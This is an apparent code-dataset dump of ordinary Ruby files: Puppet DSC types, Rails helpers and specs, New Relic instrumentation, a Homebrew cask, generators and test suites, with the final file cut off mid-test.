hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
b9f1e71b3aaea9c86ed19cc9f9aa6a83457b5c10 | 4,428 | require 'pathname'
Puppet::Type.newtype(:dsc_xd7storefrontunifiedexperience) do
  require Pathname.new(__FILE__).dirname + '../../' + 'puppet/type/base_dsc'
  require Pathname.new(__FILE__).dirname + '../../puppet_x/puppetlabs/dsc_type_helpers'

  @doc = %q{
    The DSC XD7StoreFrontUnifiedExperience resource type.
    Automatically generated from
    'XenDesktop7/DSCResources/VE_XD7StoreFrontUnifiedExperience/VE_XD7StoreFrontUnifiedExperience.schema.mof'

    To learn more about PowerShell Desired State Configuration, please
    visit https://technet.microsoft.com/en-us/library/dn249912.aspx.

    For more information about built-in DSC Resources, please visit
    https://technet.microsoft.com/en-us/library/dn249921.aspx.

    For more information about xDsc Resources, please visit
    https://github.com/PowerShell/DscResources.
  }

  # VirtualPath is the only mandatory attribute (per the MOF schema above).
  validate do
    fail('dsc_virtualpath is a required attribute') if self[:dsc_virtualpath].nil?
  end

  # Metadata consumed by the base_dsc provider to build the PowerShell
  # Invoke-DscResource call for this resource.
  def dscmeta_resource_friendly_name; 'XD7StoreFrontUnifiedExperience' end
  def dscmeta_resource_name; 'VE_XD7StoreFrontUnifiedExperience' end
  def dscmeta_module_name; 'XenDesktop7' end
  def dscmeta_module_version; '2.5.10' end

  newparam(:name, :namevar => true ) do
  end

  ensurable do
    newvalue(:exists?) { provider.exists? }
    newvalue(:present) { provider.create }
    newvalue(:absent)  { provider.destroy }
    defaultto { :present }
  end

  # Name:         PsDscRunAsCredential
  # Type:         MSFT_Credential
  # IsMandatory:  False
  # Values:       None
  newparam(:dsc_psdscrunascredential) do
    def mof_type; 'MSFT_Credential' end
    def mof_is_embedded?; true end
    desc "PsDscRunAsCredential"
    validate do |value|
      unless value.kind_of?(Hash)
        fail("Invalid value '#{value}'. Should be a hash")
      end
      PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("Credential", value)
    end
  end

  # Name:         VirtualPath
  # Type:         string
  # IsMandatory:  True
  # Values:       None
  newparam(:dsc_virtualpath) do
    def mof_type; 'string' end
    def mof_is_embedded?; false end
    desc "VirtualPath - Citrix Storefront Store IIS Virtual Path"
    isrequired
    validate do |value|
      unless value.kind_of?(String)
        fail("Invalid value '#{value}'. Should be a string")
      end
    end
  end

  # Name:         WebReceiverVirtualPath
  # Type:         string
  # IsMandatory:  False
  # Values:       None
  newparam(:dsc_webreceivervirtualpath) do
    def mof_type; 'string' end
    def mof_is_embedded?; false end
    desc "WebReceiverVirtualPath - Citrix Storefront Receiver for Web IIS Virtual Path"
    validate do |value|
      unless value.kind_of?(String)
        fail("Invalid value '#{value}'. Should be a string")
      end
    end
  end

  # Name:         SiteId
  # Type:         uint16
  # IsMandatory:  False
  # Values:       None
  newparam(:dsc_siteid) do
    def mof_type; 'uint16' end
    def mof_is_embedded?; false end
    desc "SiteId - Citrix Storefront Authentication Service IIS Site Id"
    # Accept either a non-negative Numeric or a string of decimal digits.
    validate do |value|
      unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
        fail("Invalid value #{value}. Should be a unsigned Integer")
      end
    end
    munge do |value|
      PuppetX::Dsc::TypeHelpers.munge_integer(value)
    end
  end

  # Name:         Ensure
  # Type:         string
  # IsMandatory:  False
  # Values:       ["Present", "Absent"]
  newparam(:dsc_ensure) do
    def mof_type; 'string' end
    def mof_is_embedded?; false end
    desc "Ensure - Valid values are Present, Absent."
    validate do |value|
      unless value.kind_of?(String)
        fail("Invalid value '#{value}'. Should be a string")
      end
      unless ['Present', 'present', 'Absent', 'absent'].include?(value)
        fail("Invalid value '#{value}'. Valid values are Present, Absent")
      end
      # Mirror the validated value into the native ensure property only after
      # both checks above pass. Previously #downcase was called before the
      # String check, so a non-string value raised NoMethodError instead of
      # the friendly validation message.
      resource[:ensure] = value.downcase
    end
  end

  # Adds reboot-resource relationships on top of the standard dependencies.
  def builddepends
    pending_relations = super()
    PuppetX::Dsc::TypeHelpers.ensure_reboot_relationship(self, pending_relations)
  end
end
# PowerShell provider for dsc_xd7storefrontunifiedexperience.
# All behaviour is inherited from the shared base_dsc powershell provider.
Puppet::Type.type(:dsc_xd7storefrontunifiedexperience).provide :powershell, :parent => Puppet::Type.type(:base_dsc).provider(:powershell) do
  # Only usable on hosts with WMF/PowerShell 5.0.10586.117 or newer.
  confine :true => (Gem::Version.new(Facter.value(:powershell_version)) >= Gem::Version.new('5.0.10586.117'))
  defaultfor :operatingsystem => :windows

  mk_resource_methods
end
| 31.856115 | 140 | 0.682023 |
18cc5fb197e29f311597c484d5e9c1eba877aafd | 136 | # Be sure to restart your server when you modify this file.
# Persist session data in a cookie named "_moya_session".
Moya::Application.config.session_store :cookie_store, key: '_moya_session'
| 34 | 74 | 0.794118 |
0110246c373702816fb76e620de5d2e8cd0e9398 | 5,471 | require 'rails_helper'
# This spec was generated by rspec-rails when you ran the scaffold generator.
# It demonstrates how one might use RSpec to specify the controller code that
# was generated by Rails when you ran the scaffold generator.
#
# It assumes that the implementation code is generated by the rails scaffold
# generator. If you are using any extension libraries to generate different
# controller code, this generated spec may or may not pass.
#
# It only uses APIs available in rails and/or rspec-rails. There are a number
# of tools you can use to make these specs even more expressive, but we're
# sticking to rails and rspec-rails APIs to keep things simple and stable.
#
# Compared to earlier versions of this generator, there is very limited use of
# stubs and message expectations in this spec. Stubs are only used when there
# is no simpler way to get a handle on the object needed for the example.
# Message expectations are only used when there is no simpler way to specify
# that an instance is receiving a specific message.
#
# Also compared to earlier versions of this generator, there are no longer any
# expectations of assigns and templates rendered. These features have been
# removed from Rails core in Rails 5, but can be added back in via the
# `rails-controller-testing` gem.
RSpec.describe EventsController, type: :controller do
  # This should return the minimal set of attributes required to create a valid
  # Event. As you add validations to Event, be sure to
  # adjust the attributes here as well.
  let(:valid_attributes) {
    {
      :title => "Title",
      :min_member => 2,
      :max_member => 4,
      :max_group_member => 3,
      :description => "MyText"
    }
  }

  # NOTE(review): presumably invalid because max_group_member (4) exceeds
  # max_member (3) — depends on the Event model's validations; confirm there.
  let(:invalid_attributes) {
    {
      :title => "Title",
      :min_member => 2,
      :max_member => 3,
      :max_group_member => 4,
      :description => "MyText"
    }
  }

  # This should return the minimal set of values that should be in the session
  # in order to pass any filters (e.g. authentication) defined in
  # EventsController. Be sure to keep this updated too.
  let(:valid_session) { {} }

  # NOTE(review): `be_success` is deprecated in Rails 5.2 and removed in
  # Rails 6 in favour of `be_successful` — confirm against the app's Rails
  # version before upgrading.
  describe "GET #index" do
    it "returns a success response" do
      event = Event.create! valid_attributes
      get :index, params: {}, session: valid_session
      expect(response).to be_success
    end
  end

  describe "GET #show" do
    it "returns a success response" do
      event = Event.create! valid_attributes
      get :show, params: {id: event.to_param}, session: valid_session
      expect(response).to be_success
    end
  end

  describe "GET #new" do
    it "returns a success response" do
      get :new, params: {}, session: valid_session
      expect(response).to be_success
    end
  end

  describe "GET #edit" do
    it "returns a success response" do
      event = Event.create! valid_attributes
      get :edit, params: {id: event.to_param}, session: valid_session
      expect(response).to be_success
    end
  end

  describe "POST #create" do
    context "with valid params" do
      it "creates a new Event" do
        expect {
          post :create, params: {event: valid_attributes}, session: valid_session
        }.to change(Event, :count).by(1)
      end

      it "redirects to the created event" do
        post :create, params: {event: valid_attributes}, session: valid_session
        expect(response).to redirect_to(Event.last)
      end
    end

    context "with invalid params" do
      it "returns a success response (i.e. to display the 'new' template)" do
        post :create, params: {event: invalid_attributes}, session: valid_session
        expect(response).to be_success
      end
    end
  end

  describe "PUT #update" do
    context "with valid params" do
      let(:new_attributes) {
        {
          :title => "Title2",
          :min_member => 3,
          :max_member => 5,
          :max_group_member => 4,
          :description => "MyText2"
        }
      }

      it "updates the requested event" do
        event = Event.create! valid_attributes
        put :update, params: {id: event.to_param, event: new_attributes}, session: valid_session
        event.reload
        expect(event.title).to eq "Title2"
        expect(event.min_member).to be 3
        expect(event.max_member).to be 5
        expect(event.max_group_member).to be 4
        expect(event.description).to eq "MyText2"
      end

      it "redirects to the event" do
        event = Event.create! valid_attributes
        put :update, params: {id: event.to_param, event: valid_attributes}, session: valid_session
        expect(response).to redirect_to(event)
      end
    end

    context "with invalid params" do
      it "returns a success response (i.e. to display the 'edit' template)" do
        event = Event.create! valid_attributes
        put :update, params: {id: event.to_param, event: invalid_attributes}, session: valid_session
        expect(response).to be_success
      end
    end
  end

  describe "DELETE #destroy" do
    it "destroys the requested event" do
      event = Event.create! valid_attributes
      expect {
        delete :destroy, params: {id: event.to_param}, session: valid_session
      }.to change(Event, :count).by(-1)
    end

    it "redirects to the events list" do
      event = Event.create! valid_attributes
      delete :destroy, params: {id: event.to_param}, session: valid_session
      expect(response).to redirect_to(events_url)
    end
  end
end
| 33.359756 | 100 | 0.67282 |
61978c47eeb959767128e373dd982250d149f8cb | 8,348 | # encoding: utf-8
# This file is distributed under New Relic's license terms.
# See https://github.com/newrelic/rpm/blob/master/LICENSE for complete details.
require 'new_relic/agent/datastores/metric_helper'
module NewRelic
  module Agent
    #
    # This module contains helper methods to facilitate instrumentation of
    # datastores not directly supported by the Ruby agent. It is intended to be
    # primarily used by authors of 3rd-party datastore instrumentation.
    #
    # @api public
    module Datastores

      # @!group Tracing query methods

      # Add Datastore tracing to a method. This properly generates the metrics
      # for New Relic's Datastore features. It does not capture the actual
      # query content into Transaction Traces. Use wrap if you want to provide
      # that functionality.
      #
      # @param [Class] clazz the class to instrument
      #
      # @param [String, Symbol] method_name the name of instance method to
      # instrument
      #
      # @param [String] product name of your datastore for use in metric naming, e.g. "Redis"
      #
      # @param [optional,String] operation the name of operation if different
      # than the instrumented method name
      #
      # @api public
      #
      def self.trace(clazz, method_name, product, operation = method_name)
        NewRelic::Agent.record_api_supportability_metric(:trace)

        clazz.class_eval do
          method_name_without_newrelic = "#{method_name}_without_newrelic"

          # Only instrument when the target method exists and has not already
          # been wrapped (the "_without_newrelic" alias marks prior wrapping),
          # making this call idempotent.
          if NewRelic::Helper.instance_methods_include?(clazz, method_name) &&
             !NewRelic::Helper.instance_methods_include?(clazz, method_name_without_newrelic)

            visibility = NewRelic::Helper.instance_method_visibility(clazz, method_name)

            alias_method method_name_without_newrelic, method_name

            define_method(method_name) do |*args, &blk|
              segment = NewRelic::Agent::Transaction.start_datastore_segment(
                product: product,
                operation: operation
              )
              begin
                send(method_name_without_newrelic, *args, &blk)
              ensure
                # Always close the segment, even when the wrapped call raises.
                segment.finish if segment
              end
            end

            # Restore the original method's visibility on both the wrapper and
            # the renamed original.
            send visibility, method_name
            send visibility, method_name_without_newrelic
          end
        end
      end

      # Wrap a call to a datastore and record New Relic Datastore metrics. This
      # method can be used when a collection (i.e. table or model name) is
      # known at runtime to be included in the metric naming. It is intended
      # for situations that the simpler NewRelic::Agent::Datastores.trace can't
      # properly handle.
      #
      # To use this, wrap the datastore operation in the block passed to wrap.
      #
      #   NewRelic::Agent::Datastores.wrap("FauxDB", "find", "items") do
      #     FauxDB.find(query)
      #   end
      #
      # @param [String] product the datastore name for use in metric naming,
      # e.g. "FauxDB"
      #
      # @param [String,Symbol] operation the name of operation (e.g. "select"),
      # often named after the method that's being instrumented.
      #
      # @param [optional, String] collection the collection name for use in
      # statement-level metrics (i.e. table or model name)
      #
      # @param [Proc,#call] callback proc or other callable to invoke after
      # running the datastore block. Receives three arguments: result of the
      # yield, the most specific (scoped) metric name, and elapsed time of the
      # call. An example use is attaching SQL to Transaction Traces at the end
      # of a wrapped datastore call.
      #
      #   callback = Proc.new do |result, metrics, elapsed|
      #     NewRelic::Agent::Datastores.notice_sql(query, metrics, elapsed)
      #   end
      #
      #   NewRelic::Agent::Datastores.wrap("FauxDB", "find", "items", callback) do
      #     FauxDB.find(query)
      #   end
      #
      # @note THERE ARE SECURITY CONCERNS WHEN CAPTURING QUERY TEXT!
      # New Relic's Transaction Tracing and Slow SQL features will
      # attempt to apply obfuscation to the passed queries, but it is possible
      # for a query format to be unsupported and result in exposing user
      # information embedded within captured queries.
      #
      # @api public
      #
      def self.wrap(product, operation, collection = nil, callback = nil)
        NewRelic::Agent.record_api_supportability_metric(:wrap)

        # Without an operation there is nothing to record; run the block as-is.
        return yield unless operation

        segment = NewRelic::Agent::Transaction.start_datastore_segment(
          product: product,
          operation: operation,
          collection: collection
        )
        begin
          result = yield
        ensure
          # Nested ensure: the segment must be finished even if the callback
          # itself raises.
          begin
            if callback
              # NOTE(review): wall-clock timing via Time.now; a monotonic
              # clock would be immune to system clock adjustments — confirm
              # whether segment.start_time is comparable before changing.
              elapsed_time = (Time.now - segment.start_time).to_f
              callback.call(result, segment.name, elapsed_time)
            end
          ensure
            segment.finish if segment
          end
        end
      end

      # @!group Capturing query / statement text

      # Wrapper for simplifying attaching SQL queries during a transaction.
      #
      # If you are recording non-SQL data, please use {notice_statement}
      # instead.
      #
      #   NewRelic::Agent::Datastores.notice_sql(query, metrics, elapsed)
      #
      # @param [String] query the SQL text to be captured. Note that depending
      # on user settings, this string will be run through obfuscation, but
      # some dialects of SQL (or non-SQL queries) are not guaranteed to be
      # properly obfuscated by these routines!
      #
      # @param [String] scoped_metric The most specific metric relating to this
      # query. Typically the result of
      # NewRelic::Agent::Datastores::MetricHelper#metrics_for
      #
      # @param [Float] elapsed the elapsed time during query execution
      #
      # @note THERE ARE SECURITY CONCERNS WHEN CAPTURING QUERY TEXT!
      # New Relic's Transaction Tracing and Slow SQL features will
      # attempt to apply obfuscation to the passed queries, but it is possible
      # for a query format to be unsupported and result in exposing user
      # information embedded within captured queries.
      #
      # @api public
      #
      def self.notice_sql(query, scoped_metric, elapsed)
        NewRelic::Agent.record_api_supportability_metric(:notice_sql)

        state = TransactionState.tl_get
        # Only attach when there is a current transaction with a segment that
        # supports SQL capture; otherwise this is a silent no-op.
        if (txn = state.current_transaction) && (segment = txn.current_segment) && segment.respond_to?(:notice_sql)
          segment.notice_sql(query)
        end
        nil
      end

      # Wrapper for simplifying attaching non-SQL data statements to a
      # transaction. For instance, Mongo or CQL queries, Memcached or Redis
      # keys would all be appropriate data to attach as statements.
      #
      # Data passed to this method is NOT obfuscated by New Relic, so please
      # ensure that user information is obfuscated if the agent setting
      # `transaction_tracer.record_sql` is set to `obfuscated`
      #
      #   NewRelic::Agent::Datastores.notice_statement("key", elapsed)
      #
      # @param [String] statement text of the statement to capture.
      #
      # @param [Float] elapsed the elapsed time during query execution
      #
      # @note THERE ARE SECURITY CONCERNS WHEN CAPTURING STATEMENTS!
      # This method will properly ignore statements when the user has turned
      # off capturing queries, but it is not able to obfuscate arbitrary data!
      # To prevent exposing user information embedded in captured queries,
      # please ensure all data passed to this method is safe to transmit to
      # New Relic.
      #
      # @api public
      #
      def self.notice_statement(statement, elapsed)
        NewRelic::Agent.record_api_supportability_metric(:notice_statement)

        # Settings may change eventually, but for now we follow the same
        # capture rules as SQL for non-SQL statements.
        state = TransactionState.tl_get
        if (txn = state.current_transaction) && (segment = txn.current_segment) && segment.respond_to?(:notice_nosql_statement)
          segment.notice_nosql_statement(statement)
        end
        nil
      end
    end
  end
end
| 39.563981 | 127 | 0.64758 |
ed3c4318794a87cd1a132b4a2e20d6ebecec7b05 | 747 | # frozen_string_literal: true
class QueryDelegator
  module MemoryFetching
    # Returns the first record matching +condition+ (compared with #===, as
    # Enumerable#grep does). When nothing matches, returns the given block's
    # value if a block was supplied, otherwise +default_value+ (nil unless a
    # second argument is specified).
    def fetch(condition, default_value = nil)
      matches = grep(condition)
      return matches.first unless matches.empty?
      return yield(condition) if block_given?
      default_value
    end

    # Returns the first record matching either the +block condition+ (when
    # given) or the argument +condition+; otherwise builds a new record from
    # the argument condition's Hash representation.
    def fetch_or_new(condition, &block_condition)
      matcher = block_condition || condition
      fetch(matcher) { new(condition.to_h) }
    end
  end
end
| 33.954545 | 118 | 0.720214 |
e99920d53ff4a32e54ebbf162d2a10201f9240e9 | 490 | # Rake tasks used to update the aasm_state of the employer to enrolled && plan year aasm state to enrolled.
# To run rake task: RAILS_ENV=production bundle exec rake migrations:link_employees_to_employer ce=57644137f1244e0adf000011,57644137f1244e0adf000005
require File.join(Rails.root, "app", "data_migrations", "link_employees_to_employer")

namespace :migrations do
  desc "Link employees to employer"
  # define_task (provided by LinkEmployeesToEmployer or an ancestor — see the
  # data_migrations directory) registers the rake task and makes it depend on
  # the Rails :environment task.
  LinkEmployeesToEmployer.define_task :link_employees_to_employer => :environment
end | 61.25 | 148 | 0.828571 |
b906013285782c832b2a1f5ba40b0f7fff5b611b | 850 | cask :v1 => 'coda' do
  version '2.5.12'
  sha256 '3bcb4a1f99a47edd087b9579c206a38cecae1a31287e84121c5775b8752a8c3f'

  url "https://download.panic.com/coda/Coda%20#{version}.zip"
  name 'Coda'
  homepage 'https://panic.com/Coda/'
  license :commercial
  tags :vendor => 'Panic'

  # Extra user-level files removed by a "zap" beyond the normal uninstall.
  zap :delete => [
    '~/Library/Application Support/Coda 2',
    '~/Library/Application Support/Growl/Tickets/Coda 2.growlTicket',
    '~/Library/Caches/com.panic.Coda2',
    '~/Library/Caches/com.apple.helpd/Generated/com.panic.Coda2.help',
    '~/Library/Preferences/com.panic.Coda2.plist',
    '~/Library/Preferences/com.panic.Coda2.LSSharedFileList.plist',
    '~/Library/Preferences/com.panic.Coda2.LSSharedFileList.plist.lockfile',
    '~/Library/Saved Application State/com.panic.Coda2.savedState'
  ]

  depends_on :macos => '>= :lion'

  app 'Coda 2.app'
end
| 32.692308 | 76 | 0.710588 |
1c20072dfa5bd1c1f4dc93945fe2c69ed78372ea | 1,547 | module SessionsHelper
def log_in(user)
session[:user_id] = user.id
end
def log_out
user = current_user
forget(user)
session.delete(:user_id)
@current_user = nil
end
def current_user
if (user_id = session[:user_id])
@current_user ||= User.find_by(id: user_id)
elsif (user_id = cookies.signed[:user_id])
user = User.find_by(id: user_id)
if user && user.authenticated?(:remember, cookies[:remember_token])
log_in user
@current_user = user
end
end
end
def logged_in?
!current_user.nil?
end
def remember(user)
user.remember
cookies.permanent.signed[:user_id] = user.id
cookies.permanent[:remember_token] = user.remember_token
end
def forget(user)
user.forget
cookies.delete(:user_id)
cookies.delete(:remember_token)
end
def logged_user
user = current_user
unless logged_in? && (user.poste != '1' || user.administrateur)
flash[:danger] = "Vous n'avez pas l'authorisation d'être sur cette page !"
redirect_to login_path
end
end
def logged_cadre
user = current_user
unless logged_in? && (user.poste == '1'|| user.administrateur)
flash[:danger] = "Vous n'avez pas l'authorisation d'être sur cette page !"
redirect_to root_path
end
true
end
def logged_admin
user = current_user
unless logged_in? && user.administrateur
flash[:danger] = "Vous n'avez pas l'authorisation d'être sur cette page !"
redirect_to root_path
end
true
end
end
| 23.089552 | 80 | 0.660633 |
f7caa43ac88fe614edee37562a17bff1b2591ac5 | 1,238 | require 'rails/generators/active_record'
module ActiveRecord
  module Generators
    # Implements `rails generate model` for ActiveRecord: creates the model
    # class, an optional migration, and (for nested names such as Admin::User)
    # the enclosing namespace module file.
    class ModelGenerator < Base
      argument :attributes, :type => :array, :default => [], :banner => "field:type field:type"

      check_class_collision

      class_option :migration, :type => :boolean
      class_option :timestamps, :type => :boolean
      class_option :parent, :type => :string, :desc => "The parent class for the generated model"
      class_option :indexes, :type => :boolean, :default => true, :desc => "Add indexes for references and belongs_to columns"

      # Skipped when --no-migration is given or when --parent is specified
      # (presumably because subclasses share the parent's table — confirm).
      def create_migration_file
        return unless options[:migration] && options[:parent].nil?
        migration_template "migration.rb", "db/migrate/create_#{table_name}.rb"
      end

      def create_model_file
        template 'model.rb', File.join('app/models', class_path, "#{file_name}.rb")
      end

      # For namespaced models, generate the namespace module file; only on
      # invoke (not on revoke/destroy).
      def create_module_file
        return if regular_class_path.empty?
        template 'module.rb', File.join('app/models', "#{class_path.join('/')}.rb") if behavior == :invoke
      end

      hook_for :test_framework

      protected

      def parent_class_name
        options[:parent] || "ActiveRecord::Base"
      end
    end
  end
end
| 30.95 | 129 | 0.65105 |
01243648e7817f3310efc103af8a974cd5799518 | 5,257 | # frozen_string_literal: true
describe 'Ridgepole::Client#diff -> migrate' do
  context 'when rename table' do
    # Schema as it exists in the database before the rename.
    let(:actual_dsl) do
      erbh(<<-ERB)
        create_table "clubs", force: :cascade do |t|
          t.string "name", default: "", null: false
          t.index ["name"], name: "idx_name", unique: true
        end

        create_table "departments", primary_key: "dept_no", force: :cascade do |t|
          t.string "dept_name", limit: 40, null: false
          t.index ["dept_name"], name: "dept_name", unique: true
        end

        create_table "dept_emp", id: false, force: :cascade do |t|
          t.integer "emp_no", null: false
          t.string "dept_no", null: false
          t.date "from_date", null: false
          t.date "to_date", null: false
          t.index ["dept_no"], name: "dept_no"
          t.index ["emp_no"], name: "emp_no"
        end

        create_table "dept_manager", id: false, force: :cascade do |t|
          t.string "dept_no", null: false
          t.integer "emp_no", null: false
          t.date "from_date", null: false
          t.date "to_date", null: false
          t.index ["dept_no"], name: "dept_no"
          t.index ["emp_no"], name: "emp_no"
        end

        create_table "employee_clubs", force: :cascade do |t|
          t.integer "emp_no", null: false
          t.integer "club_id", null: false
          t.index ["emp_no", "club_id"], name: "idx_emp_no_club_id"
        end

        create_table "employees2", primary_key: "emp_no", force: :cascade do |t|
          t.date "birth_date", null: false
          t.string "first_name", limit: 14, null: false
          t.string "last_name", limit: 16, null: false
          t.string "gender", limit: 1, null: false
          t.date "hire_date", null: false
        end

        create_table "salaries", id: false, force: :cascade do |t|
          t.integer "emp_no", null: false
          t.integer "salary", null: false
          t.date "from_date", null: false
          t.date "to_date", null: false
          t.index ["emp_no"], name: "emp_no"
        end

        create_table "titles", id: false, force: :cascade do |t|
          t.integer "emp_no", null: false
          t.string "title", limit: 50, null: false
          t.date "from_date", null: false
          t.date "to_date"
          t.index ["emp_no"], name: "emp_no"
        end
      ERB
    end

    # Identical to actual_dsl except that employees2 declares
    # renamed_from: 'employees' — the table has ALREADY been renamed.
    let(:expected_dsl) do
      erbh(<<-ERB)
        create_table "clubs", force: :cascade do |t|
          t.string "name", default: "", null: false
          t.index ["name"], name: "idx_name", unique: true
        end

        create_table "departments", primary_key: "dept_no", force: :cascade do |t|
          t.string "dept_name", limit: 40, null: false
          t.index ["dept_name"], name: "dept_name", unique: true
        end

        create_table "dept_emp", id: false, force: :cascade do |t|
          t.integer "emp_no", null: false
          t.string "dept_no", null: false
          t.date "from_date", null: false
          t.date "to_date", null: false
          t.index ["dept_no"], name: "dept_no"
          t.index ["emp_no"], name: "emp_no"
        end

        create_table "dept_manager", id: false, force: :cascade do |t|
          t.string "dept_no", null: false
          t.integer "emp_no", null: false
          t.date "from_date", null: false
          t.date "to_date", null: false
          t.index ["dept_no"], name: "dept_no"
          t.index ["emp_no"], name: "emp_no"
        end

        create_table "employee_clubs", force: :cascade do |t|
          t.integer "emp_no", null: false
          t.integer "club_id", null: false
          t.index ["emp_no", "club_id"], name: "idx_emp_no_club_id"
        end

        create_table "employees2", primary_key: "emp_no", force: :cascade, renamed_from: 'employees' do |t|
          t.date "birth_date", null: false
          t.string "first_name", limit: 14, null: false
          t.string "last_name", limit: 16, null: false
          t.string "gender", limit: 1, null: false
          t.date "hire_date", null: false
        end

        create_table "salaries", id: false, force: :cascade do |t|
          t.integer "emp_no", null: false
          t.integer "salary", null: false
          t.date "from_date", null: false
          t.date "to_date", null: false
          t.index ["emp_no"], name: "emp_no"
        end

        create_table "titles", id: false, force: :cascade do |t|
          t.integer "emp_no", null: false
          t.string "title", limit: 50, null: false
          t.date "from_date", null: false
          t.date "to_date"
          t.index ["emp_no"], name: "emp_no"
        end
      ERB
    end

    before { subject.diff(actual_dsl).migrate }
    subject { client }

    it {
      # A renamed_from pointing at an already-renamed table should warn,
      # produce no diff, and leave the schema untouched by migrate.
      expect(Ridgepole::Logger.instance).to receive(:warn).with('[WARNING] The table `employees` has already been renamed to the table `employees2`.')

      delta = subject.diff(expected_dsl)
      expect(delta.differ?).to be_falsey
      expect(subject.dump).to match_ruby actual_dsl
      delta.migrate
      # The dump never contains the renamed_from annotation itself.
      expect(subject.dump).to match_ruby expected_dsl.gsub(/, renamed_from: 'employees'/, '')
    }
  end
end
| 37.021127 | 150 | 0.562108 |
03f3c2cd549bb2f614df5ab7f61d1248a6eab4a8 | 1,007 | require "rails_helper"
include Warden::Test::Helpers
include FormAnswerFilteringTestHelper
Warden.test_mode!

describe "As Assessor I want to filter applications", js: true do
  let!(:assessor) { create(:assessor) }
  let!(:ceremonial_county) { create(:ceremonial_county) }

  before do
    @forms = []
    4.times do
      @forms << create(:form_answer, state: "local_assessment_recommended", sub_group: assessor.sub_group)
    end
    # Persist while skipping validations (the state above is set directly).
    # NOTE(review): `each.map` builds a throwaway array — plain `each` would do.
    @forms.each.map do |form|
      form.save!(validate: false)
    end
    login_as(assessor, scope: :assessor)
    visit assessor_form_answers_path
  end

  it "filters by activity" do
    assert_results_number(4)
    assign_activity(@forms.first, "ART")
    # Untick sport activity filter
    click_status_option "Sport"
    assert_results_number(1)
  end

  it "filters by ceremonial county" do
    assert_results_number(4)
    assign_ceremonial_county(@forms.first, ceremonial_county)
    click_status_option("Not assigned")
    assert_results_number(1)
  end
end
| 23.97619 | 106 | 0.722939 |
1afa1f51b379e58d9370b146c9108055686e0951 | 141 | class RemoveUserFromBook < ActiveRecord::Migration
def change
remove_reference :books, :user, index: true, foreign_key: true
end
end
| 23.5 | 66 | 0.765957 |
d5c5618540de2d7b7278126db42a099a20458e2a | 1,595 | # vFabric Administration Server Ruby API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Shared
# @abstract A collection of an instance's pending configurations
class PendingConfigurations < MutableCollection
# Creates a new configuration. The configuration will be pending until its instance is started at which point the configuration will become live
#
# @param path [String] the configuration's path
# @param content [String] the configuration's content
#
# @return [PendingConfiguration] the new configuration
def create(path, content)
create_image(content, { :path => path })
end
end
# @abstract A configuration file that is pending and will be made live the next time its instance is started
class PendingConfiguration < Configuration
include Deletable
# Updates the contents of the configuration
#
# @param new_content [String] the new content
def content=(new_content)
client.post(content_location, new_content)
reload
end
end
end | 32.55102 | 148 | 0.739185 |
626da622812eae3931f4830263b6ffccf511988a | 451 | module PactBroker
module Pacts
module LazyLoaders
HEAD_PACT_PUBLICATIONS_FOR_TAGS = lambda {
consumer_version_tag_names = PactBroker::Domain::Tag.select(:name).where(version_id: consumer_version_id)
PactPublication
.for_consumer(consumer)
.for_provider(provider)
.latest_for_consumer_tag(consumer_version_tag_names)
.from_self.order_by(:tag_name)
}
end
end
end
| 30.066667 | 113 | 0.682927 |
e2f894a34808dec24998cb7435ec637e237e071f | 1,113 | $:.unshift(File.join(File.dirname(__FILE__), '..', 'lib'))
require './test/replica_sets/rs_test_helper'
class ComplexConnectTest < Test::Unit::TestCase
  def setup
    ensure_rs
  end

  def teardown
    @rs.restart_killed_nodes
    @conn.close if defined?(@conn) && @conn
  end

  # Exercises replica-set reconnection: removes one seed node from the
  # replica-set config, steps down the primary, and verifies the
  # ReplSetConnection can still serve reads afterwards.
  def test_complex_connect
    primary = Connection.new(@rs.host, @rs.ports[0])

    # Seed list deliberately given in reverse port order.
    @conn = ReplSetConnection.new([
      "#{@rs.host}:#{@rs.ports[2]}",
      "#{@rs.host}:#{@rs.ports[1]}",
      "#{@rs.host}:#{@rs.ports[0]}",
    ])

    @conn['test']['foo'].insert({:a => 1})
    assert @conn['test']['foo'].find_one

    # Bump the config version and drop the member on ports[2].
    config = primary['local']['system.replset'].find_one
    config['version'] += 1
    config['members'].delete_if do |member|
      member['host'].include?(@rs.ports[2].to_s)
    end

    # Reconfig/step-down sever connections, so ConnectionFailure is expected.
    assert_raise ConnectionFailure do
      primary['admin'].command({:replSetReconfig => config})
    end
    @rs.ensure_up

    assert_raise ConnectionFailure do
      primary['admin'].command({:replSetStepDown => 1})
    end

    rescue_connection_failure do
      assert @conn['test']['foo'].find_one
    end
  end
end
| 24.195652 | 60 | 0.621743 |
1cda0f198d65ce51d7f95a5becb23bf6b61e868b | 6,041 | require 'alki/feature_test'
# Feature tests for Alki's `overlay` DSL directive.
#
# An overlay intercepts the value produced for a *service* element: when the
# target service is resolved, its value is passed to the overlay (a callable,
# or a class — in which case `Klass.new(value)` is used) and the overlay's
# result is returned to callers instead.  These examples pin down:
#   * overlays apply to services only (set/factory/func are untouched),
#   * an overlay on a group applies to every service underneath it,
#   * multiple overlays on one element chain in declaration order,
#   * target/overlay references resolve as paths (incl. `assembly.` prefixes,
#     mounts and overrides), raising Alki::InvalidPathError on bad paths.
describe 'Overlays' do
  it 'should allow setting an overlay on a service' do
    values = []
    assembly = Alki.create_assembly do
      service :svc do
        :test
      end
      # `overlay TARGET, OVERLAY` — both arguments are element paths.
      overlay :svc, :test_overlay
      set :test_overlay, ->(value) {values << value; :transformed}
    end
    # The overlay sees the original service value and replaces the result.
    assembly.new.svc.must_equal :transformed
    values.must_equal [:test]
  end
  it 'should call new if overlay responds to it' do
    assembly = Alki.create_assembly do
      service :svc do
        :test
      end
      overlay :svc, :test_overlay
      # A class overlay is instantiated with the service value.
      set :test_overlay, Struct.new(:val)
    end
    assembly.new.svc.val.must_equal :test
  end
  it 'should allow using factories as overlays' do
    values = []
